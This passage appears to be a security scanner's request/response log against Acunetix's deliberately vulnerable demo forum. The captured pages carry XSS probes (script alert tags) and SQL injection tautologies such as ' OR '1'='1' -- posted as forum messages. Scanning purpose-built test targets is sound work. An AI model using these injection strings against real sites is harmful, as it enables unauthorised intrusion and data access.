bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">login</a> - <a 